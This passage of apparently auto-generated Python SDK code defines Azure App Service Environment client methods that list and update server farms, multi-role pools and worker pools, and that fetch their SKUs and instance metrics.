'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
if properties_to_include is not None:
query_parameters['propertiesToInclude'] = self._serialize.query("properties_to_include", properties_to_include, 'str')
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('SiteCollection', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def get_hosting_environment_web_hosting_plans(
self, resource_group_name, name, custom_headers=None, raw=False, **operation_config):
"""
Get all serverfarms (App Service Plans) on the hostingEnvironment (App
Service Environment).
:param resource_group_name: Name of resource group
:type resource_group_name: str
:param name: Name of hostingEnvironment (App Service Environment)
:type name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`ServerFarmCollection
<azure.mgmt.web.models.ServerFarmCollection>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/webhostingplans'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('ServerFarmCollection', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def get_hosting_environment_server_farms(
self, resource_group_name, name, custom_headers=None, raw=False, **operation_config):
"""
Get all serverfarms (App Service Plans) on the hostingEnvironment (App
Service Environment).
:param resource_group_name: Name of resource group
:type resource_group_name: str
:param name: Name of hostingEnvironment (App Service Environment)
:type name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`ServerFarmCollection
<azure.mgmt.web.models.ServerFarmCollection>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/serverfarms'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('ServerFarmCollection', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def get_multi_role_pools(
self, resource_group_name, name, custom_headers=None, raw=False, **operation_config):
"""
Get all multi role pools
:param resource_group_name: Name of resource group
:type resource_group_name: str
:param name: Name of hostingEnvironment (App Service Environment)
:type name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`WorkerPoolCollection
<azure.mgmt.web.models.WorkerPoolCollection>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/multiRolePools'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('WorkerPoolCollection', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def get_multi_role_pool(
self, resource_group_name, name, custom_headers=None, raw=False, **operation_config):
"""
Get properties of a multiRool pool.
:param resource_group_name: Name of resource group
:type resource_group_name: str
:param name: Name of hostingEnvironment (App Service Environment)
:type name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`WorkerPool <azure.mgmt.web.models.WorkerPool>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/multiRolePools/default'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('WorkerPool', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def create_or_update_multi_role_pool(
self, resource_group_name, name, multi_role_pool_envelope, custom_headers=None, raw=False, **operation_config):
"""
Create or update a multiRole pool.
:param resource_group_name: Name of resource group
:type resource_group_name: str
:param name: Name of hostingEnvironment (App Service Environment)
:type name: str
:param multi_role_pool_envelope: Properties of multiRole pool
:type multi_role_pool_envelope: :class:`WorkerPool
<azure.mgmt.web.models.WorkerPool>`
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:rtype:
:class:`AzureOperationPoller<msrestazure.azure_operation.AzureOperationPoller>`
instance that returns :class:`WorkerPool
<azure.mgmt.web.models.WorkerPool>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/multiRolePools/default'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(multi_role_pool_envelope, 'WorkerPool')
# Construct and send request
def long_running_send():
request = self._client.put(url, query_parameters)
return self._client.send(
request, header_parameters, body_content, **operation_config)
def get_long_running_status(status_link, headers=None):
request = self._client.get(status_link)
if headers:
request.headers.update(headers)
return self._client.send(
request, header_parameters, **operation_config)
def get_long_running_output(response):
if response.status_code not in [200, 202, 400, 404, 409]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('WorkerPool', response)
if response.status_code == 202:
deserialized = self._deserialize('WorkerPool', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
if raw:
response = long_running_send()
return get_long_running_output(response)
long_running_operation_timeout = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
return AzureOperationPoller(
long_running_send, get_long_running_output,
get_long_running_status, long_running_operation_timeout)
def get_multi_role_pool_skus(
self, resource_group_name, name, custom_headers=None, raw=False, **operation_config):
"""
Get available skus for scaling a multiRole pool.
:param resource_group_name: Name of resource group
:type resource_group_name: str
:param name: Name of hostingEnvironment (App Service Environment)
:type name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`SkuInfoCollection
<azure.mgmt.web.models.SkuInfoCollection>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/multiRolePools/default/skus'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('SkuInfoCollection', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def get_worker_pools(
self, resource_group_name, name, custom_headers=None, raw=False, **operation_config):
"""
Get all worker pools
:param resource_group_name: Name of resource group
:type resource_group_name: str
:param name: Name of hostingEnvironment (App Service Environment)
:type name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`WorkerPoolCollection
<azure.mgmt.web.models.WorkerPoolCollection>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/workerPools'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('WorkerPoolCollection', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def get_worker_pool(
self, resource_group_name, name, worker_pool_name, custom_headers=None, raw=False, **operation_config):
"""
Get properties of a worker pool.
:param resource_group_name: Name of resource group
:type resource_group_name: str
:param name: Name of hostingEnvironment (App Service Environment)
:type name: str
:param worker_pool_name: Name of worker pool
:type worker_pool_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`WorkerPool <azure.mgmt.web.models.WorkerPool>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/workerPools/{workerPoolName}'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
'workerPoolName': self._serialize.url("worker_pool_name", worker_pool_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('WorkerPool', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def create_or_update_worker_pool(
self, resource_group_name, name, worker_pool_name, worker_pool_envelope, custom_headers=None, raw=False, **operation_config):
"""
Create or update a worker pool.
:param resource_group_name: Name of resource group
:type resource_group_name: str
:param name: Name of hostingEnvironment (App Service Environment)
:type name: str
:param worker_pool_name: Name of worker pool
:type worker_pool_name: str
:param worker_pool_envelope: Properties of worker pool
:type worker_pool_envelope: :class:`WorkerPool
<azure.mgmt.web.models.WorkerPool>`
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:rtype:
:class:`AzureOperationPoller<msrestazure.azure_operation.AzureOperationPoller>`
instance that returns :class:`WorkerPool
<azure.mgmt.web.models.WorkerPool>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/workerPools/{workerPoolName}'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
'workerPoolName': self._serialize.url("worker_pool_name", worker_pool_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(worker_pool_envelope, 'WorkerPool')
# Construct and send request
def long_running_send():
request = self._client.put(url, query_parameters)
return self._client.send(
request, header_parameters, body_content, **operation_config)
def get_long_running_status(status_link, headers=None):
request = self._client.get(status_link)
if headers:
request.headers.update(headers)
return self._client.send(
request, header_parameters, **operation_config)
def get_long_running_output(response):
if response.status_code not in [200, 202, 400, 404, 409]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('WorkerPool', response)
if response.status_code == 202:
deserialized = self._deserialize('WorkerPool', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
if raw:
response = long_running_send()
return get_long_running_output(response)
long_running_operation_timeout = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
return AzureOperationPoller(
long_running_send, get_long_running_output,
get_long_running_status, long_running_operation_timeout)
def get_worker_pool_skus(
self, resource_group_name, name, worker_pool_name, custom_headers=None, raw=False, **operation_config):
"""
Get available skus for scaling a worker pool.
:param resource_group_name: Name of resource group
:type resource_group_name: str
:param name: Name of hostingEnvironment (App Service Environment)
:type name: str
:param worker_pool_name: Name of worker pool
:type worker_pool_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`SkuInfoCollection
<azure.mgmt.web.models.SkuInfoCollection>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/workerPools/{workerPoolName}/skus'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
'workerPoolName': self._serialize.url("worker_pool_name", worker_pool_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('SkuInfoCollection', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def get_worker_pool_instance_metrics(
self, resource_group_name, name, worker_pool_name, instance, details=None, filter=None, custom_headers=None, raw=False, **operation_config):
"""
Get metrics for a specific instance of a worker pool of a
hostingEnvironment (App Service Environment).
:param resource_group_name: Name of resource group
:type resource_group_name: str
:param name: Name of hostingEnvironment (App Service Environment)
:type name: str
:param worker_pool_name: Name of worker pool
:type worker_pool_name: str
:param instance: Name of instance in the worker pool
:type instance: str
:param details: Include instance details
:type details: bool
:param filter: Return only usages/metrics specified in the filter.
Filter conforms to odata syntax. Example: $filter=(name.value eq
'Metric1' or name.value eq 'Metric2') and startTime eq
'2014-01-01T00:00:00Z' and endTime eq '2014-12-31T23:59:59Z' and
timeGrain eq duration'[Hour|Minute|Day]'.
:type filter: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: object
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/workerPools/{workerPoolName}/instances/{instance}/metrics'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
'workerPoolName': self._serialize.url("worker_pool_name", worker_pool_name, 'str'),
'instance': self._serialize.url("instance", instance, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
if details is not None:
query_parameters['details'] = self._serialize.query("details", details, 'bool')
if filter is not None:
query_parameters['$filter'] = self._serialize.query("filter", filter, 'str')
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('object', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def get_worker_pool_instance_metric_definitions(
self, resource_group_name, name, worker_pool_name, instance, custom_headers=None, raw=False, **operation_config):
"""
Get metric definitions for a specific instance of a worker pool of a
hostingEnvironment (App Service Environment).
:param resource_group_name: Name of resource group
:type resource_group_name: str
:param name: Name of hostingEnvironment (App Service Environment)
:type name: str
:param worker_pool_name: Name of worker pool
:type worker_pool_name: str
:param instance: Name of instance in the worker pool
:type instance: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: object
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/workerPools/{workerPoolName}/instances/{instance}/metricdefinitions'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
'workerPoolName': self._serialize.url("worker_pool_name", worker_pool_name, 'str'),
'instance': self._serialize.url("instance", instance, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('object', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def get_multi_role_pool_instance_metrics(
self, resource_group_name, name, instance, details=None, custom_headers=None, raw=False, **operation_config):
"""
Get metrics for a specific instance of a multiRole pool of a
hostingEnvironment (App Service Environment).
:param resource_group_name: Name of resource group
:type resource_group_name: str
:param name: Name of hostingEnvironment (App Service Environment)
:type name: str
:param instance: Name of instance in the multiRole pool
:type instance: str
:param details: Include instance details
:type details: bool
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: object
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/multiRolePools/default/instances/{instance}/metrics'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
'instance': self._serialize.url("instance", instance, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
if details is not None:
query_parameters['details'] = self._serialize.query("details", details, 'bool')
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('object', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def get_multi_role_pool_instance_metric_definitions(
self, resource_group_name, name, instance, custom_headers=None, raw=False, **operation_config):
"""
Get metric definitions for a specific instance of a multiRole pool of
a hostingEnvironment (App Service Environment).
:param resource_group_name: Name of resource group
:type resource_group_name: str
:param name: Name of hostingEnvironment (App Service Environment)
:type name: str
:param instance: Name of instance in the multiRole pool>
:type instance: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: object
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/multiRolePools/default/instances/{instance}/metricdefinitions'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
'instance': self._serialize.url("instance", instance, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
